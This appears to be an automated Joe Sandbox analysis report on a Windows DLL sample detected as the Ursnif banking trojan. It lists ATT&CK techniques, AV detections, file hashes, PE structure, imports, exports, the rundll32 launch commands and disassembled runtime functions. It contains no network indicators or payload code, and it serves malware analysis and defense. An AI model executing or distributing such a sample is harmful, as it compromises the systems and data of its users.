Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsNative API1Path InterceptionProcess Injection12Rundll321OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection12LSASS MemorySecurity Software Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information2NTDSFile and Directory Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsSystem Information Discovery23SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 412403 Sample: c63f1121_by_Libranalysis Startdate: 12/05/2021 Architecture: WINDOWS Score: 56 19 Multi AV Scanner detection for submitted file 2->19 21 Yara detected  Ursnif 2->21 7 loaddll32.exe 1 2->7         started        process3 process4 9 cmd.exe 1 7->9         started        11 rundll32.exe 7->11         started        13 rundll32.exe 7->13         started        15 rundll32.exe 7->15         started        process5 17 rundll32.exe 9->17         started       

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
c63f1121_by_Libranalysis.dll21%VirustotalBrowse
c63f1121_by_Libranalysis.dll11%ReversingLabsWin32.Trojan.Razy

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:32.0.0 Black Diamond
Analysis ID:412403
Start date:12.05.2021
Start time:17:12:28
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 7m 53s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:c63f1121_by_Libranalysis (renamed file extension from none to dll)
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:7
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal56.troj.winDLL@11/0@0/0
EGA Information:Failed
HDC Information:
  • Successful, ratio: 4.2% (good quality ratio 4%)
  • Quality average: 78.8%
  • Quality standard deviation: 29.2%
HCA Information:Failed
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General

File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):6.694754169899549
TrID:
  • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
  • Generic Win/DOS Executable (2004/3) 0.20%
  • DOS Executable Generic (2002/1) 0.20%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:c63f1121_by_Libranalysis.dll
File size:482816
MD5:c63f11211f899e38c1c230594024950a
SHA1:4d5baeaf852156dbe8053a1c600c7d96049f5967
SHA256:70f617d8686bdc7d17d4f3b992a27f2532686815aaf5289841b87fd0c198ff3a
SHA512:acb47d73ee0ae648188d90ba65584e4261ca8c174305e30e7249d7c8daeccb7b1ac71d8c85d269077b1397adbd29e3deba99ffb89f24c02e8dccbefab14f556b
SSDEEP:12288:I5wfdldhr+GsAmRljPDeV1QlPqY5ExsETZCnMWxGuXPmEb8bVFaJ:I5adldhlDmfjPdglZCnR6jw
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........R...R...R...[.......7...P...7...@...R.......7...W...7...X...7...S...7...J...7.u.S...7...S...RichR...................PE..L..

File Icon

Icon Hash:74f0e4ecccdce0e4

Static PE Info

General

Entrypoint:0x102aa97
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x1000000
Subsystem:windows gui
Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
Time Stamp:0x6092A053 [Wed May 5 13:40:35 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:6
OS Version Minor:0
File Version Major:6
File Version Minor:0
Subsystem Version Major:6
Subsystem Version Minor:0
Import Hash:9c4dbee4f67fcf1f44b302fd37d240a5

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007FE828F11C07h
call 00007FE828F12522h
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+08h]
call 00007FE828F11AAAh
add esp, 0Ch
pop ebp
retn 000Ch
jmp 00007FE828F1F976h
push ebp
mov ebp, esp
and dword ptr [01088AA0h], 00000000h
sub esp, 24h
or dword ptr [010740ACh], 01h
push 0000000Ah
call 00007FE828F43CEBh
test eax, eax
je 00007FE828F11DAFh
and dword ptr [ebp-10h], 00000000h
xor eax, eax
push ebx
push esi
push edi
xor ecx, ecx
lea edi, dword ptr [ebp-24h]
push ebx
cpuid
mov esi, ebx
pop ebx
mov dword ptr [edi], eax
mov dword ptr [edi+04h], esi
mov dword ptr [edi+08h], ecx
xor ecx, ecx
mov dword ptr [edi+0Ch], edx
mov eax, dword ptr [ebp-24h]
mov edi, dword ptr [ebp-1Ch]
mov dword ptr [ebp-0Ch], eax
xor edi, 6C65746Eh
mov eax, dword ptr [ebp-18h]
xor eax, 49656E69h
mov dword ptr [ebp-08h], eax
mov eax, dword ptr [ebp-20h]
xor eax, 756E6547h
mov dword ptr [ebp-04h], eax
xor eax, eax
inc eax
push ebx
cpuid
mov esi, ebx
pop ebx
lea ebx, dword ptr [ebp-24h]
mov dword ptr [ebx], eax
mov eax, dword ptr [ebp-04h]
mov dword ptr [ebx+04h], esi
or eax, edi
or eax, dword ptr [ebp-08h]
mov dword ptr [ebx+08h], ecx
mov dword ptr [ebx+0Ch], edx
jne 00007FE828F11C45h
mov eax, dword ptr [ebp-24h]
and eax, 0FFF3FF0h
cmp eax, 000106C0h
je 00007FE828F11C25h
cmp eax, 00020660h
je 00007FE828F11C1Eh

Rich Headers

Programming Language:
  • [IMP] VS2008 SP1 build 30729

Data Directories

NameVirtual AddressVirtual Size Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT0x725e00x78.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT0x726580x50.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE0x8a0000x4a8.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
IMAGE_DIRECTORY_ENTRY_BASERELOC0x8b0000x2984.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG0x70d0c0x54.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
IMAGE_DIRECTORY_ENTRY_TLS0x00x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x70d600x40.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IAT0x5e0000x1b4.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

Sections

NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
.text0x10000x5c9e80x5ca00False0.615445238698data6.76388282152IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata0x5e0000x150ea0x15200False0.523761094675data5.71930655491IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data0x740000x15d140xe00False0.208426339286DOS executable (COM, 0x8C-variant)2.91984916435IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc0x8a0000x4a80x600False0.367838541667data3.03803804684IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc0x8b0000x29840x2a00False0.793712797619data6.70935013464IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

NameRVASizeTypeLanguageCountry
RT_VERSION0x8a0a00x36cdataEnglishUnited States
RT_MANIFEST0x8a4100x91XML 1.0 document textEnglishUnited States

Imports

DLLImport
KERNEL32.dllWriteConsoleW, FindFirstChangeNotificationW, GetEnvironmentVariableW, LoadLibraryW, CreateEventW, FileTimeToLocalFileTime, DeviceIoControl, WaitForSingleObject, VirtualProtectEx, VirtualProtect, GetVersion, CloseHandle, CreateFileW, OutputDebugStringW, ReadConsoleW, ReadFile, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, GetModuleHandleW, GetCurrentProcess, TerminateProcess, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RaiseException, RtlUnwind, InterlockedPushEntrySList, InterlockedFlushSList, GetLastError, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, GetCurrentThread, HeapAlloc, GetCPInfo, HeapFree, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, GetDateFormatW, GetTimeFormatW, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetProcessHeap, GetStdHandle, GetFileType, SetConsoleCtrlHandler, GetStringTypeW, HeapSize, HeapReAlloc, SetStdHandle, FlushFileBuffers, WriteFile, GetConsoleCP, GetConsoleMode, GetFileSizeEx, SetFilePointerEx, DecodePointer
CRYPT32.dllCryptDecodeObject, CertVerifyCertificateChainPolicy, CertFreeCertificateChain, CertGetCertificateChain, CryptAcquireCertificatePrivateKey, CryptImportPublicKeyInfo, CertDeleteCertificateFromStore, CertAddCertificateContextToStore, CertFreeCertificateContext, CertCreateCertificateContext, CertCloseStore, CryptEncodeObject
Secur32.dllImpersonateSecurityContext, InitializeSecurityContextW, DeleteSecurityContext, FreeContextBuffer

Exports

NameOrdinalAddress
Dark@@410x1029882
Schoolpress@@820x1029898
Triangleart@@830x10299a8

Version Infos

DescriptionData
LegalCopyright Settle equal Corporation. All rights reserved
InternalNameProperty Womentogether
FileVersion6.6.8.172
CompanyNameSettle equal Corporation
Money90
ProductNameSettle equal Rope lie
ProductVersion6.6.8.172
FileDescriptionSettle equal Rope lie
OriginalFilenameCell.dll
Translation0x0409 0x04b0

Possible Origin

Language of compilation systemCountry where language is spokenMap
EnglishUnited States

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 6632 Parent PID: 5856

General

Start time:17:13:16
Start date:12/05/2021
Path:C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):true
Commandline:loaddll32.exe 'C:\Users\user\Desktop\c63f1121_by_Libranalysis.dll'
Imagebase:0xcf0000
File size:116736 bytes
MD5 hash:542795ADF7CC08EFCF675D65310596E8
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Chronological Activities

Analysis Process: cmd.exe PID: 6640 Parent PID: 6632

General

Start time:17:13:16
Start date:12/05/2021
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\c63f1121_by_Libranalysis.dll',#1
Imagebase:0x11d0000
File size:232960 bytes
MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Chronological Activities

Analysis Process: rundll32.exe PID: 6652 Parent PID: 6632

General

Start time:17:13:16
Start date:12/05/2021
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:rundll32.exe C:\Users\user\Desktop\c63f1121_by_Libranalysis.dll,Dark@@4
Imagebase:0x1170000
File size:61952 bytes
MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Chronological Activities

Analysis Process: rundll32.exe PID: 6664 Parent PID: 6640

General

Start time:17:13:16
Start date:12/05/2021
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:rundll32.exe 'C:\Users\user\Desktop\c63f1121_by_Libranalysis.dll',#1
Imagebase:0x1170000
File size:61952 bytes
MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Chronological Activities

Analysis Process: rundll32.exe PID: 6708 Parent PID: 6632

General

Start time:17:13:20
Start date:12/05/2021
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:rundll32.exe C:\Users\user\Desktop\c63f1121_by_Libranalysis.dll,Schoolpress@@8
Imagebase:0x1170000
File size:61952 bytes
MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Chronological Activities

Analysis Process: rundll32.exe PID: 6724 Parent PID: 6632

General

Start time:17:13:23
Start date:12/05/2021
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:rundll32.exe C:\Users\user\Desktop\c63f1121_by_Libranalysis.dll,Triangleart@@8
Imagebase:0x1170000
File size:61952 bytes
MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Chronological Activities

Disassembly

Code Analysis

Reset < >

    Analysis Process: loaddll32.exe PID: 6632 Parent PID: 5856 loaddll32.exeCOMMON

    Executed Functions

    Function 6D52A8A8, Relevance: 12.1, APIs: 8, Instructions: 136COMMON
    Download Yara Rule
    APIs
    • __RTC_Initialize.LIBCMT ref: 6D52A8EF
    • ___scrt_uninitialize_crt.LIBCMT ref: 6D52A909
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: Initialize___scrt_uninitialize_crt
    • String ID:
    • API String ID: 2442719207-0
    • Opcode ID: 78d8ae7c352570639f0f2a5c82d7c434c5200dc43c28f48242bbbbaf102869fc
    • Instruction ID: 595d8f42a4247939171a340a72e1e44b72c2530bb220d5dd408d084d3e39fd0b
    • Opcode Fuzzy Hash: 78d8ae7c352570639f0f2a5c82d7c434c5200dc43c28f48242bbbbaf102869fc
    • Instruction Fuzzy Hash: D2410332D08226AFDB298F65CC40FAE7A75EFC1B65F024419E92557AC0C7304D098FA0
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D52A958, Relevance: 7.6, APIs: 5, Instructions: 87COMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: dllmain_raw$dllmain_crt_dispatch
    • String ID:
    • API String ID: 3136044242-0
    • Opcode ID: b3654e4926da37d0847fd49d11c7922a5328385dbf5a26a18d57d14d9c1dda13
    • Instruction ID: 320ebb8cc9b7f9ae688d4b65ec6c1f1d1e2a28de22e9a359cfa2196ae796c12e
    • Opcode Fuzzy Hash: b3654e4926da37d0847fd49d11c7922a5328385dbf5a26a18d57d14d9c1dda13
    • Instruction Fuzzy Hash: 44219172D0461AAFCB298E25CD40E7F3A79EFC4BA4F024515F82557A90C7308D498FE0
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D52A7A1, Relevance: 4.6, APIs: 3, Instructions: 76COMMON
    Download Yara Rule
    APIs
    • __RTC_Initialize.LIBCMT ref: 6D52A7EE
      • Part of subcall function 6D52B40D: InitializeSListHead.KERNEL32(6D588DD0,6D52A7F8,6D571D60,00000010,6D52A789,?,?,?,6D52A9B1,?,00000001,?,?,00000001,?,6D571DA8), ref: 6D52B412
    • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6D52A858
    • ___scrt_fastfail.LIBCMT ref: 6D52A8A2
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: Initialize$HeadList___scrt_fastfail___scrt_is_nonwritable_in_current_image
    • String ID:
    • API String ID: 2097537958-0
    • Opcode ID: 0aa489b78d39a88b3577829db704d799b14d996c9964aa8f70a6ed2a60e6617b
    • Instruction ID: 9c8ae21e878c3c0282fbb5e741d260dd475e9d98cd92f08348496be605965202
    • Opcode Fuzzy Hash: 0aa489b78d39a88b3577829db704d799b14d996c9964aa8f70a6ed2a60e6617b
    • Instruction Fuzzy Hash: 2721273254C2129EDF1D7BB49804FAC3B729F8226DF124816D680B7DC2DB32484EC6A6
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D547E2E, Relevance: 4.6, APIs: 3, Instructions: 68COMMON
    Download Yara Rule
    APIs
    • GetEnvironmentStringsW.KERNEL32 ref: 6D547E37
    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6D547EA5
      • Part of subcall function 6D547D21: WideCharToMultiByte.KERNEL32(?,00000000,6D54A405,00000000,00000001,6D54A1AC,6D551463,?,6D54A405,?,00000000,?,6D5511C1,0000FDE9,00000000,?), ref: 6D547DC3
      • Part of subcall function 6D543817: RtlAllocateHeap.NTDLL(00000000,?,?,?,6D5298A7,000008C8), ref: 6D543849
    • _free.LIBCMT ref: 6D547E96
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: EnvironmentStrings$AllocateByteCharFreeHeapMultiWide_free
    • String ID:
    • API String ID: 2560199156-0
    • Opcode ID: 36ffac122e7cc15a2c712a9d455d7d2afd754acf446a64f8baf1166f7d2ef928
    • Instruction ID: 604745672baac06a8786eaa324d27bfd8d21effb9be8fb8d002f97d0819bcfcc
    • Opcode Fuzzy Hash: 36ffac122e7cc15a2c712a9d455d7d2afd754acf446a64f8baf1166f7d2ef928
    • Instruction Fuzzy Hash: 5701FCB3D156163B6B1A01B64C88C7B2A6ECDC6B943118628FA14D2500FF50CD0181F2
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D55037D, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 6D545D30: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6D54375B,00000001,00000364,00000007,000000FF,?,?,?,6D5438E3,6D54385A), ref: 6D545D71
    • _free.LIBCMT ref: 6D5503EC
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: AllocateHeap_free
    • String ID:
    • API String ID: 614378929-0
    • Opcode ID: 2c42c5002e163c3ee7b5e6a90864c2509c68fed5d330ce80ee1f83e26ec47326
    • Instruction ID: c8bbc1e966fbac0da53536dc9ed95ebd30271cd62d37d50f3c885a2f62d0442c
    • Opcode Fuzzy Hash: 2c42c5002e163c3ee7b5e6a90864c2509c68fed5d330ce80ee1f83e26ec47326
    • Instruction Fuzzy Hash: F60189726083126BC326CF5DC88099EFB98EB443B4F020A2EE551A3AC0D3706D10CBE0
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D545D30, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON
    Download Yara Rule
    APIs
    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6D54375B,00000001,00000364,00000007,000000FF,?,?,?,6D5438E3,6D54385A), ref: 6D545D71
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: AllocateHeap
    • String ID:
    • API String ID: 1279760036-0
    • Opcode ID: 116f7a87ed38b69585d8ed5c3f438d8a4d9ea566ab4ed7a1ba8855f336c5b591
    • Instruction ID: e9374abefb1ccb153a20242b3a8ebceb6198635ec6c7f30bf1487769857007c1
    • Opcode Fuzzy Hash: 116f7a87ed38b69585d8ed5c3f438d8a4d9ea566ab4ed7a1ba8855f336c5b591
    • Instruction Fuzzy Hash: 1BF0E93164457567EF1E5A76CC0CB7B3798AF82770B12C922E814DBC94DB20EA0586E3
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D543817, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
    Download Yara Rule
    APIs
    • RtlAllocateHeap.NTDLL(00000000,?,?,?,6D5298A7,000008C8), ref: 6D543849
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: AllocateHeap
    • String ID:
    • API String ID: 1279760036-0
    • Opcode ID: 8e3807fc032ebccb02d7d3b4332d34bdb57a3df986fde2a11bf87cf6679b0cc9
    • Instruction ID: 162616de51d10bf397ea5111f40005fe0da24cb644c8ad94b93cb7b65b522875
    • Opcode Fuzzy Hash: 8e3807fc032ebccb02d7d3b4332d34bdb57a3df986fde2a11bf87cf6679b0cc9
    • Instruction Fuzzy Hash: A9E09B355C72229BFB5A16EA8C04B67F75CAF827A1F12C934ED1597CB4EB60D80046E3
    Uniqueness

    Uniqueness Score: -1.00%

    Non-executed Functions

    Function 6D5307FD, Relevance: 58.9, APIs: 32, Strings: 1, Instructions: 1115COMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: Name::operator+$operator+
    • String ID: /
    • API String ID: 1595903985-2043925204
    • Opcode ID: 894a396952c350a246be41e58c1b3438e3a312075efdbc1b58d5214ecb27f2c2
    • Instruction ID: c36158d3e7f96a8b5e44fbc6d42ab311e494395fec2dda646c76e84afb0cc79b
    • Opcode Fuzzy Hash: 894a396952c350a246be41e58c1b3438e3a312075efdbc1b58d5214ecb27f2c2
    • Instruction Fuzzy Hash: 16824272D1472A9BDF0DCFA9C890BEEB7B4BB44344F12452AE515E7A80FB349A44CB50
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D54EA25, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 251COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 6D5435B9: GetLastError.KERNEL32(?,?,?,6D550F08,00000000,00000001,6D54A405,?,6D5513D8,00000001,?,?,?,6D54A1AC,?,00000000), ref: 6D5435BE
      • Part of subcall function 6D5435B9: SetLastError.KERNEL32(00000000,00000007,000000FF,?,6D5513D8,00000001,?,?,?,6D54A1AC,?,00000000,00000000,6D572358,0000002C,6D54A405), ref: 6D54365C
    • GetACP.KERNEL32(?,?,?,?,?,?,6D544733,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 6D54EAE6
    • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,6D544733,?,?,?,00000055,?,-00000050,?,?), ref: 6D54EB11
    • _wcschr.LIBVCRUNTIME ref: 6D54EBA5
    • _wcschr.LIBVCRUNTIME ref: 6D54EBB3
    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 6D54EC74
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
